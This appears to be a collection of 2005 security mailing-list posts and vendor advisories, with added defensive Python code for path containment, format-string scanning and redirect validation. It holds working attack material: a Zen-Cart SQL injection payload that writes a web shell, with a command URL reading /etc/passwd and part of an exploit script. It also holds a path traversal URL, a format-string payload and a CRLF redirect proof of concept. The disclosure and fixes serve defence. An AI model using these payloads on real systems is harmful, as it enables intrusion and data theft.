more MD5 colliding examples
Hello everybody,

Last month we presented in a lightning talk at PacSec a few interesting and somehow new things related to MD5 collisions: 2 different Win32 .EXE files with the same MD5 hash, and 4 different files (inputs) with the same MD5 hash. These are direct results of reimplementing the already known attacks on MD5, specifically abusing the fact that collisions can be generated for arbitrary IVs.

Today we are releasing some new stuff:

- The 4 colliding files have been increased to 8 files (there is no real limit in the number of colliding files which can be generated, this is just an example of what can be done).
- Two new Win32 .EXE files, this time with the same MD5 hash and also the same CRC32, the same checksum 32 and the same checksum 16.

Of course all this is no big theoretical breakthrough, but it's somehow interesting to have examples to show to the incredulous.

All the information (the files and presentation explaining how to regenerate the files) from PacSec is now available at http://www.corest.com/corelabs/projects/research_topics.php.

have fun!
gera
Zen-Cart <= 1.2.6d blind SQL injection / remote commands execution:
software:
site: http://www.zencart.com/
description: "Zen Cart truly is the art of e-commerce; a free, user-friendly, open source shopping cart system. The software is being developed by group of like-minded shop owners, programmers, designers, and consultants that think e-commerce could be and should be done differently.[..]"

i) blind SQL INJECTION -> remote commands/code execution

vulnerable code in admin/password_forgotten.php:

    ...
    if (isset($_POST['submit'])) {
      if ( !$_POST['admin_email'] ) {
        $error_check = true;
        $email_message = ERROR_WRONG_EMAIL_NULL;
      }
      $admin_email = zen_db_prepare_input($_POST['admin_email']);
      $sql = "select admin_id, admin_name, admin_email, admin_pass from " . TABLE_ADMIN . " where admin_email = '" . $admin_email . "'";
    ...

With magic_quotes_gpc both on & off you can post an e-mail like this to create a shell:

    'UNION SELECT 0,0,'',0 INTO OUTFILE '[full_application_path]shell.php' FROM admin/*

so the query becomes:

    select admin_id, admin_name, admin_email, admin_pass from admin where admin_email = ''UNION SELECT 0,0,'',0 INTO OUTFILE '[full_application_path]shell.php FROM admin/*'

and after that launch commands:

    http://[target]/[path]/shell.php?cmd=cat%20/etc/passwd

this is my proof of concept exploit:

    http://rgod.altervista.org
    # -> this works with magic_quotes_gpc both on & off
    # usage: launch from Apache, fill in requested fields, then go!
    # Sun-Tzu: "With his forces intact he will dispute the mastery
    # of the Empire, and thus, without losing a man, his triumph
    # will be complete. This is the method of attacking by stratagem."

    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout", 5);
    ob_implicit_flush (1);
    echo'Zen-Cart<=1.2.6d blind SQL injection/ remote cmmnds xctn body {background-color:#11; SCROLLBAR-ARROW-COLOR: #ff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img {background-color: #FF !important} input {background-color:#303030 !important} option { background-color: #303030 !important} textarea {background-color: #303030 !important} input {color: #1CB081 !important} option {color: #1CB081 !important} textarea {color: #1CB081 !important}checkbox {background-color: #303030 !important} select {font-weight: normal; color: #1CB081; background-color: #303030;} body {font-size: 8pt !important; background-color: #11; body * {font-size: 8pt !important} h1 {font-size: 0.8em !important} h2 {font-size: 0.8em!important} h3 {font-size: 0.8em !important} h4,h5,h6{font-size: 0.8em !important} h1 font {font-size: 0.8em !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: normal !important} *{text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline; color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:bold; font-style: italic;}--> Zen-Cart<=1.2.6d blind SQL injection/ remote cmmnds xctna script by rgod athttp://rgod.altervista.org"target="_blank";> http://rgod.altervista.org * hostname (ex:www.sitename.com) * path (ex: /zencart/ or just / ) * specify a command full application path (ex: "/www/zencart/", "../../www/zencart/","c:\www\zencart\" ), if not specified, we will try to disclose the path specify a port other than 80 ( default value ) sendexploit through an HTTP proxy (ip:port) ';

    function show($headeri)
    {
      $ii=0; $ji=0; $ki=0; $ci=0;
      echo '';
      while ($ii <= strlen($headeri)-1) {
        $datai=dechex(ord($headeri[$ii]));
        if ($ji==16) {
          $ji=0; $ci++;
          echo " ";
          for ($li=0; $li<=15; $li++) { echo "".$headeri[$li+$ki].""; }
          $ki=$ki+16;
          echo "";
        }
        if (strlen($datai)==1) {echo "0".$datai."";} else {echo "".$datai." ";}
        $ii++; $ji++;
      }
      for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo " "; }
      for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo "".$headeri[$li].""; }
      echo "";
    }
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}
eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities
http://www.phpbbstyles.com/

Description
===
These vulnerabilities could allow an attacker that has gained administrative access to view file content on the system.

1. Remote File Content Disclosure
===
In xs_edit.php, the "edit" request field is not properly sanitized.

2. Full Path Disclosure
===
In xs_edit.php, the "viewbackup" request field is not properly sanitized.

Proof of Concept
1. http://forum/admin/xs_edit.php?edit=../../../../etc/passwd
2. http://forum/admin/xs_edit.php?edit=&viewbackup=1

--
http://wtf.bz/
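The first proof of concept works because xs_edit.php joins the "edit" value onto a template directory and opens the result without checking where it points. The containment check below is an added example, not code from eXtreme Styles or phpBB: it canonicalises both the base directory and the joined path and accepts the request only if the result still lies inside the base. The base directory and file names are constructed for the demo.

```python
import os


def resolve_within(base_dir, requested):
    """Return the absolute path for `requested`, but only if it stays inside base_dir.

    Both paths are canonicalised with realpath so that `..` segments and symlinks
    are resolved before the check; os.path.commonpath (rather than a string prefix
    test) prevents /srv/x_evil from being accepted as "inside" /srv/x.
    """
    if not requested:
        raise ValueError("empty file name")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes base directory: %r" % requested)
    return target


def is_contained(base_dir, requested):
    """Boolean form of resolve_within, for use as a request-validation gate."""
    try:
        resolve_within(base_dir, requested)
        return True
    except ValueError:
        return False


def classify(base_dir, requested_names):
    """Label each candidate file name as allowed or rejected."""
    return {name: ("allowed" if is_contained(base_dir, name) else "rejected")
            for name in requested_names}


if __name__ == "__main__":
    # Constructed template directory and request values (the last one is the PoC string).
    BASE = "/srv/forum/templates"
    for name, verdict in classify(BASE, [
        "subSilver/overall_header.tpl",
        "../templates_evil/x.tpl",
        "/etc/passwd",
        "../../../../etc/passwd",
    ]).items():
        print("%-32s %s" % (name, verdict))
```

Note that an absolute value such as /etc/passwd is rejected too: os.path.join discards the base when the second argument is absolute, and the containment test catches that case as well as the `..` form.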
PHP-Fusion v6.00.109 SQL Injection and Info. Disclosure
In the latest version of PHP-Fusion, the content management system by Digitanium (php-fusion.co.uk), there is an SQL error in messages.php that reveals path names and a table name, and someone could possibly manipulate the SQL database.

The error is as follows; it is with the Search and Sort option:

    /messages.php?folder=inbox&srch_text=a&srch_type=blehblahbleh&sort_type=blahblehblah&srch_submit=Search%20/%20Sort

The query above will give the following error (or something to the effect):

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIKE 'a'' at line 1
    Warning: mysql_result(): supplied argument is not a valid MySQL result resource in c:\WWW\removed\data\maincore.php on line 111
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIKE 'a'' at line 1
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIKE 'a' ORDER BY message_read, LIMIT 0,20' at line 1
    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in c:\WWW\removed\data\maincore.php on line 116
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIKE 'a' ORDER BY message_read, LIMIT 0,20' at line 1

The error could be used to obtain classified information about the database and the system, and is definitely manipulable.

-Nolan West (CNS Chemist)
DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string vulnerability'
Author: Kevin Finisterre
Vendor: http://www.mulliner.org/bluetooth/sobexsrv.php
Product: 'sobexsrv'
References:
http://www.digitalmunition.com/DMA[2005-1202a].txt
http://www.mulliner.org/bluetooth/sobexsrv-1.0.0_pre3.tar.gz

Description:

The trifinite.blog is a weblog that is maintained by the trifinite.group. Every now and then you will find new entries there...

Over Turkey Day I noticed a blog entry about a 'not really security related but very useful' Bluetooth application from the trifinite.group. There were actually two new applications but one jumped out at me right away. One of the apps needed hardware I did not have so I did not pay much attention to it; sobexsrv however seemed interesting.

sobexsrv is a Bluetooth OBEX server with Bluetooth Security Mode-2 (application triggered security) support. It implements OPUSH (put), OPULL (get) and OBEX-FTP (setpath + directory listing) and therefore is a full OBEX server. sobexsrv was designed with flexibility and security in mind...

Since I truly think Trifinite is pretty hardcore I almost didn't bother looking for bugs in this daemon. I pretty much assumed it would be rock solid. I figured if you can whisper at cars and shit you can certainly write an OBEX server.

Being lazy I assumed that the examples from the man pages were easy enough to get me started using the sobexsrv. I quickly found that the first 2 man page examples can be used as examples for triggering a format string issue.

EXAMPLES

Simple setup using the internal mode, logging with syslog(8) and INBOX in /tmp.

    sobexsrv -IS -r /tmp

Simple secure setup with chroot and Bluetooth security mode-2.

    sobexsrv -s 2 -ISR -l X -r /tmp

In both examples shown above the -S option is used to enable syslog() logging. A format string issue was located almost immediately in the syslog support for the logging functions. Several instances of user input are passed to an unformatted syslog() call when using dosyslog().

    [EMAIL PROTECTED]:~/sobexsrv-1.0.0_pre3$ grep syslog\( . -rin
    ./src/obexsrv.c:58: void dosyslog(char *m1, void *m2, void *m3)
    ./src/obexsrv.c:71: syslog(LOG_INFO, log);
    ...
    ./src/obexsrv.c:203:dosyslog("folder listing for \"%s\"\n", path, 0);
    ./src/obexsrv.c:290:if (ret) dosyslog("pulling \"%s\"\n", fullpath, 0);
    ./src/obexsrv.c:291:else dosyslog("failed pulling \"%s\"\n", fullpath, 0);
    ./src/obexsrv.c:334:if (ret) dosyslog("pushing \"%s\"\n", fullpath, 0);
    ./src/obexsrv.c:335:else dosyslog("faild pushing \"%s\"\n", fullpath, 0);
    ./src/obexsrv.c:356:if (ret) dosyslog("deleting \"%s\"\n", fullpath, 0);
    ./src/obexsrv.c:357:else dosyslog("failed deleting \"%s\"\n", fullpath, 0);
    ./src/obexsrv.c:401:dosyslog("created directory \"%s\"\n", fullpath, 0);
    ./src/obexsrv.c:406:dosyslog("failed to create directory \"%s\"\n", fullpath, 0);
    ...

As an example I used a Windows machine with the Widcomm Bluetooth stack to create a folder named "--%19$x.%20$x" on a remote host. The My Bluetooth Places icon provides an OBEX FTP interface which worked perfectly for a quick verification of the bug.

    Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connecting...
    Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connected
    Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] folder listing for "/tmp"
    Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] created directory "/tmp//---41414141.42424242"
    Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnecting...
    Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnected

The host in this example is a PowerPC Linux box so keep in mind that the x86 offsets will differ. This vulnerability is pretty trivial to exploit as shown below. We run the server in debug mode so that we can see what is going on a little better. Then we exploit it with a scripted ussp-push.

    [EMAIL PROTECTED]:~$ sobexsrv -ISd -r /home/kfinisterre/
    security: mode = 1
    REQHINT - add handler for this!
    CONNECT start
    CONNECT ok, result = 1
    CONNECT end
    REQDONE
    REQHINT - add handler for this!
    PUT start
    PUT name: %1997.d%27$hn%76819.d%28$hnAAA AA AAA
    PUT length: 201
    PUT body length: 201
    PUT data_type 1
    internal_handler: put for "/home/kfinisterre//%1997.d%27$hn%76819.d%28$hnAAA AA AAA" length=201
    PUT ok
    PUT end
    REQDONE
    REQHINT - add handler for this!
    DISCONNECT start
    DISCONNECT end
    uid=1000(kfinisterre) gid=1000(kfinisterre) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterr
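The grep output above is exactly what a code reviewer looks for: a syslog() or printf-family call whose format argument is a variable (obexsrv.c:71, `syslog(LOG_INFO, log);`) rather than a string literal, so that any `%` directives in the logged file name are interpreted. The fix is to make the untrusted text an argument of a literal format, `syslog(LOG_INFO, "%s", log);`. The scanner below is an added example, not part of this advisory or of sobexsrv: it flags non-literal format arguments in C source. The sample it runs over is constructed from the two lines quoted in the grep output plus a hardened line and two printf lines; the body of dosyslog() is not on the page and is elided.

```python
import re

# 0-based position of the format-string argument for each function we check.
FORMAT_ARG_INDEX = {
    "syslog": 1, "printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2,
    "vsyslog": 1, "vprintf": 0, "vsnprintf": 2,
}

# \b keeps wrappers such as dosyslog() from matching as syslog().
CALL_RE = re.compile(r"\b(" + "|".join(FORMAT_ARG_INDEX) + r")\s*\(")


def split_args(text):
    """Split the text following '(' into arguments at top-level commas,
    honouring nested parentheses and double-quoted strings; stops at the
    ')' that closes the call."""
    args, cur, depth, in_str, i = [], [], 0, False, 0
    while i < len(text):
        c = text[i]
        if in_str:
            cur.append(c)
            if c == "\\" and i + 1 < len(text):   # keep escaped char inside the literal
                cur.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            cur.append(c)
        elif c in "([":
            depth += 1
            cur.append(c)
        elif c in ")]":
            if depth == 0:
                break
            depth -= 1
            cur.append(c)
        elif c == "," and depth == 0:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(c)
        i += 1
    args.append("".join(cur).strip())
    return args


def find_nonliteral_formats(source):
    """Return (line number, function, format argument) for every call whose
    format argument does not start with a string literal."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in CALL_RE.finditer(line):
            func = m.group(1)
            args = split_args(line[m.end():])
            idx = FORMAT_ARG_INDEX[func]
            if idx < len(args) and not args[idx].startswith('"'):
                findings.append((lineno, func, args[idx]))
    return findings


# Constructed sample: the two obexsrv.c lines from the grep output plus
# a hardened call and two printf calls. The dosyslog body is elided.
SAMPLE_C = """\
void dosyslog(char *m1, void *m2, void *m3)
{
    /* body elided: builds the buffer `log` from m1, m2, m3 */
    syslog(LOG_INFO, log);        /* as obexsrv.c:71: log is used as the format string */
    syslog(LOG_INFO, "%s", log);  /* hardened form: untrusted text is only an argument */
    printf("%d bytes\\n", n);      /* literal format, fine */
    fprintf(stderr, msg);         /* non-literal format: flagged */
}
"""

if __name__ == "__main__":
    for lineno, func, arg in find_nonliteral_formats(SAMPLE_C):
        print("line %d: %s() format argument is not a literal: %s" % (lineno, func, arg))
```

The scanner is line-based and intentionally simple; a call split across lines or a format built by a macro needs a real parser. It is a triage aid for finding the pattern, and the review decision stays with the reader.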
QNX 4.25 suided dhcp.client binary
Hello all,

I recently got a QNX 4.25 VMware image and I found that the dhcp.client shipped with it is suided. This obviously enables a normal user to control the NIC's configuration and produce some other attacks (eg: if the system has some services which depend on 'host/ip based' authentication [NFS, NIS, rlogin, etc]).

Some VMware screenshots are available at: http://lms.ispgaya.pt/goodies/qnx/

I haven't got access to other QNX installations so, although the person who gave me the image said the binary wasn't changed, can anybody else confirm this?

Best regards,
+-
| Luís Miguel Ferreira da Silva
| Unidade de Qualidade e Segurança
| Centro de Informática Professor Correia Araújo
| Faculdade de Engenharia da Universidade do Porto

Attachment: binDeU1K0xu0v.bin (PGP Public Key)
[Updated] [FLSA-2005:166943] Updated php packages fix security issues
Fedora Legacy Update Advisory

Synopsis:     Updated php packages fix security issues
Advisory ID:  FLSA:166943
Issue date:   2005-12-02
Product:      Red Hat Linux, Fedora Core
Keywords:     Bugfix
CVE Names:    CVE-2005-2498 CVE-2005-3390 CVE-2005-3389 CVE-2005-3388 CVE-2005-3353

1. Topic:

Updated PHP packages that fix multiple security issues are now available.

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.

[Updated 2nd December 2005]
Red Hat Linux 9 packages have been updated to add missing security patches.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

A bug was discovered in the PEAR XML-RPC Server package included in PHP. If a PHP script is used which implements an XML-RPC Server using the PEAR XML-RPC package, then it is possible for a remote attacker to construct an XML-RPC request which can cause PHP to execute arbitrary PHP commands as the 'apache' user. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-2498 to this issue.

A flaw was found in the way PHP registers global variables during a file upload request. A remote attacker could submit a carefully crafted multipart/form-data POST request that would overwrite the $GLOBALS array, altering expected script behavior, and possibly leading to the execution of arbitrary PHP commands. Please note that this vulnerability only affects installations which have register_globals enabled in the PHP configuration file, which is not a default or recommended option. The Common Vulnerabilities and Exposures project assigned the name CVE-2005-3390 to this issue.

A flaw was found in the PHP parse_str() function. If a PHP script passes only one argument to the parse_str() function, and the script can be forced to abort execution during operation (for example due to the memory_limit setting), the register_globals may be enabled even if it is disabled in the PHP configuration file. This vulnerability only affects installations that have PHP scripts using the parse_str function in this way. (CVE-2005-3389)

A Cross-Site Scripting flaw was found in the phpinfo() function. If a victim can be tricked into following a malicious URL to a site with a page displaying the phpinfo() output, it may be possible to inject javascript or HTML content into the displayed page or steal data such as cookies. This vulnerability only affects installations which allow users to view the output of the phpinfo() function. As the phpinfo() function outputs a large amount of information about the current state of PHP, it should only be used during debugging or if protected by authentication. (CVE-2005-3388)

A denial of service flaw was found in the way PHP processes EXIF image data. It is possible for an attacker to cause PHP to crash by supplying carefully crafted EXIF image data. (CVE-2005-3353)

Users of PHP should upgrade to these updated packages, which contain backported patches that resolve these issues.

4. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

    rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs.

Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue:

    yum update

or to use apt:

    apt-get update; apt-get upgrade

This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=166943

6. RPMs required:

Red Hat Linux 7.3:

SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/php-4.1.2-7.3.18.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-4.1.2-7.3.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-devel-4.1.2-7.3.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-imap-4.1.2-7.3.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-ldap-4.1.2-7.3.18.legacy.i386.rpm
http://download.fed
[OpenPKG-SA-2005.027] OpenPKG Security Advisory (php)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

OpenPKG Security Advisory                            The OpenPKG Project
http://www.openpkg.org/security.html                  http://www.openpkg.org
[EMAIL PROTECTED]                                     [EMAIL PROTECTED]
OpenPKG-SA-2005.027                                          03-Dec-2005

Package:             php
Vulnerability:       multiple ones
OpenPKG Specific:    no

Affected Releases:   Affected Packages:          Corrected Packages:
OpenPKG CURRENT      <= php-4.4.0-20051004       >= php-4.4.1-20051031
OpenPKG 2.5          <= php-4.4.0-2.5.1          >= php-4.4.0-2.5.2
                     <= apache-1.3.33-2.5.3      >= apache-1.3.33-2.5.4
OpenPKG 2.4          <= php-4.3.11-2.4.1         >= php-4.3.11-2.4.2
                     <= apache-1.3.33-2.4.3      >= apache-1.3.33-2.4.4
OpenPKG 2.3          <= php-4.3.10-2.3.3         >= php-4.3.10-2.3.4
                     <= apache-1.3.33-2.3.5      >= apache-1.3.33-2.3.6

Description:
  Multiple vulnerabilities were recently found in the PHP [1] web scripting language:

  1. The "exif_read_data" function in the EXIF module in PHP before 4.4.1 allows remote attackers to cause a Denial of Service (DoS) through an infinite recursion via a malformed JPEG image. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3353 [2] to the problem.

  2. A Cross-Site Scripting (XSS) vulnerability in the "phpinfo" function in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5 allows remote attackers to inject arbitrary web script or HTML via a crafted URL with a "stacked array assignment". The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3388 [3] to the problem.

  3. The "parse_str" function in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5, when called with only one parameter, allows remote attackers to enable the "register_globals" directive via inputs that cause a request to be terminated due to the "memory_limit" setting, which causes PHP to set an internal flag that enables "register_globals" and allows attackers to exploit vulnerabilities in PHP applications that would otherwise be protected. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3389 [4] to the problem.

  4. The RFC1867 file upload feature in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5, when "register_globals" is enabled, allows remote attackers to modify the "GLOBALS" array and bypass security protections of PHP applications via a "multipart/form-data" POST request with a "GLOBALS" "fileupload" field. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3390 [5] to the problem.

  5. Multiple vulnerabilities in PHP before 4.4.1 allow remote attackers to bypass "safe_mode" and "open_basedir" restrictions via unknown attack vectors in the "curl" and "gd" extensions. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3391 [6] to the problem.

  6. The additionally discovered issue CVE-2005-3392 doesn't affect PHP under the OpenPKG platforms.

References:
  [1] http://www.php.net/
  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3353
  [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3388
  [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3389
  [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3390
  [6] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3391

For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/ for details on how to verify the integrity of this advisory.

-----BEGIN PGP SIGNATURE-----
Comment: OpenPKG <[EMAIL PROTECTED]>

iD8DBQFDkeIjgHWT4GPEy58RAr0kAKDI3vR3w7KhCg2iQ5h9au1LiYv2ogCdF4c7
IgeVMyxYVnQdAh6vmLP1kJE=
=hdmj
-----END PGP SIGNATURE-----
MDKSA-2005:222 - Updated mailman packages fix various vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
Mandriva Linux Security Advisory                         MDKSA-2005:222
http://www.mandriva.com/security/
___

Package : mailman
Date: December 2, 2005
Affected: 10.1, 10.2, 2006.0, Corporate 3.0
___

Problem Description:

Scrubber.py in Mailman 2.1.4 - 2.1.6 does not properly handle UTF8 character encodings in filenames of e-mail attachments, which allows remote attackers to cause a denial of service. (CVE-2005-3573)

In addition, these versions of mailman have an issue where the server will fail with an Overflow on bad date data in a processed message.

The version of mailman in Corporate Server 2.1 does not contain the above vulnerable code.

Updated packages are patched to correct these issues.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3573
___

Updated Packages:

Mandriva Linux 10.1:
b62f2bdad4a9295bcedec597f5479843 10.1/RPMS/mailman-2.1.5-7.5.101mdk.i586.rpm
4ebd694b50ccbc9f2b602676840c4bc9 10.1/SRPMS/mailman-2.1.5-7.5.101mdk.src.rpm

Mandriva Linux 10.1/X86_64:
a887edf3dd65a418c441fae7588f7e5e x86_64/10.1/RPMS/mailman-2.1.5-7.5.101mdk.x86_64.rpm
4ebd694b50ccbc9f2b602676840c4bc9 x86_64/10.1/SRPMS/mailman-2.1.5-7.5.101mdk.src.rpm

Mandriva Linux 10.2:
99e3dbde709dfa5eb7bd71041adf41be 10.2/RPMS/mailman-2.1.5-15.2.102mdk.i586.rpm
c01867687ff9c78b4c1e2da9d70c4f11 10.2/SRPMS/mailman-2.1.5-15.2.102mdk.src.rpm

Mandriva Linux 10.2/X86_64:
c66dd1916ba0d8ecf8796b1890a064fd x86_64/10.2/RPMS/mailman-2.1.5-15.2.102mdk.x86_64.rpm
c01867687ff9c78b4c1e2da9d70c4f11 x86_64/10.2/SRPMS/mailman-2.1.5-15.2.102mdk.src.rpm

Mandriva Linux 2006.0:
f917270b5334f62843bbdb4a06d12ae0 2006.0/RPMS/mailman-2.1.6-6.2.20060mdk.i586.rpm
15bc0be9373657ac39a9e3956de90801 2006.0/SRPMS/mailman-2.1.6-6.2.20060mdk.src.rpm

Mandriva Linux 2006.0/X86_64:
e92b1dd1ae0bfe3bbc61ba5d6f3b52c3 x86_64/2006.0/RPMS/mailman-2.1.6-6.2.20060mdk.x86_64.rpm
15bc0be9373657ac39a9e3956de90801 x86_64/2006.0/SRPMS/mailman-2.1.6-6.2.20060mdk.src.rpm

Corporate 3.0:
867bdc1fe018e94eb4d5352fc69747ae corporate/3.0/RPMS/mailman-2.1.4-2.5.C30mdk.i586.rpm
572477eb207dadbabc22b0e53b0c2b2b corporate/3.0/SRPMS/mailman-2.1.4-2.5.C30mdk.src.rpm

Corporate 3.0/X86_64:
8a4cc67f45481e9d4b25c41e80f54809 x86_64/corporate/3.0/RPMS/mailman-2.1.4-2.5.C30mdk.x86_64.rpm
572477eb207dadbabc22b0e53b0c2b2b x86_64/corporate/3.0/SRPMS/mailman-2.1.4-2.5.C30mdk.src.rpm
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
___

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFDkKPamqjQ0CJFipgRAli4AKCLkrxtdpNyvYclD5KxuVVAZFAHCgCgw0NO
Uq5wc0mG0ABsi0Kyn7l6xR0=
=e/3r
-----END PGP SIGNATURE-----
Re: WebCalendar
Hi, Dan:

Since some of the vulnerabilities have been fixed by the vendor, I have updated this vulnerability advisory; sorry for any trouble I have caused to you. The following is the updated advisory:

===
WebCalendar CRLF Injection Vulnerability

I. BACKGROUND
WebCalendar is a PHP application used to maintain a calendar for one or more persons and for a variety of purposes.

II. DESCRIPTION
CRLF injection vulnerability in WebCalendar layers_toggle.php allows remote attackers to inject false HTTP headers into an HTTP request, via a URL containing encoded carriage return, line feed, and other whitespace characters.

III. PUBLISH DATE
Publish Date: 2005-12-1
Update Date: 2005-12-2

IV. AUTHOR
lwang (lwang at lwang dot org)

V. AFFECTED SOFTWARE
WebCalendar version 1.0.1 and 1.1.0 are affected. Older versions are not verified.

VI. ANALYSIS
In layers_toggle.php, parameter $ret is not validated.

    if ( empty ( $error ) ) {
      // Go back to where we where if we can figure it out.
      if ( strlen ( $ret ) )
        do_redirect ( $ret );
      else if ( ! empty ( $HTTP_REFERER ) )
        do_redirect ( $HTTP_REFERER );
      else
        send_to_preferred_view ();
    }

Proof of Concept:
http://victim/webcalendar/layers_toggle.php?status=on&ret=[url_redirect_to]

VII. SOLUTION
Input validation will fix the bug.

VIII. ADVISORY
http://vd.lwang.org/webcalendar_crlf_injection.txt

IX. REFERENCE
http://www.k5n.us/webcalendar.php

On 12/2/05, Daniel Bertrand <[EMAIL PROTECTED]> wrote:
>
> Hi,
>
> What is the vendor web site for this application? I need this information
> to write up this BID.
>
> Regards,
>
> Dan B.
>

--
Regards,
Bill Louis
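The advisory's one-line solution, "input validation will fix the bug", leaves open what a redirect target validator has to check: a Location header value cannot contain CR or LF (the header injection), and it should not send the user off-site either (the open redirect the `ret=[url_redirect_to]` proof of concept also gives). The Python below is an added example and not WebCalendar code: it accepts only a site-relative path or an http(s) URL on the application's own host, after rejecting any control character, and mirrors the $ret / HTTP_REFERER / preferred-view fallback order of layers_toggle.php. The host name and the default view path are constructed placeholders.

```python
from urllib.parse import unquote, urlsplit


def is_safe_return_target(ret, own_host, max_len=2048):
    """True only for a same-site http(s) URL or a site-relative path with no control characters."""
    if not ret or len(ret) > max_len:
        return False
    # %0d%0a arrives percent-encoded; decoding once here is conservative if the
    # framework has already decoded the parameter (a doubly-encoded value is then
    # rejected rather than let through).
    decoded = unquote(ret)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return False            # CR, LF, TAB, NUL ... can never be part of a header value
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc:
        # absolute URL, or scheme-relative //host: only http(s) to our own host
        return parts.scheme in ("http", "https") and parts.hostname == own_host.lower()
    # site-relative: one leading slash; "//" and "/\" are read as host-relative by browsers
    return decoded.startswith("/") and not decoded.startswith(("//", "/\\"))


def pick_redirect(ret, referer, own_host, default="/webcalendar/index.php"):
    """Same fallback order as layers_toggle.php ($ret, then the referer, then a
    preferred view), but every candidate is validated instead of trusted.
    `default` stands in for send_to_preferred_view() and is a placeholder."""
    for candidate in (ret, referer):
        if candidate is not None and is_safe_return_target(candidate, own_host):
            return candidate
    return default


if __name__ == "__main__":
    HOST = "calendar.example.test"      # constructed own-host value
    for value in [
        "/webcalendar/index.php?date=20051202",
        "http://calendar.example.test/webcalendar/views.php",
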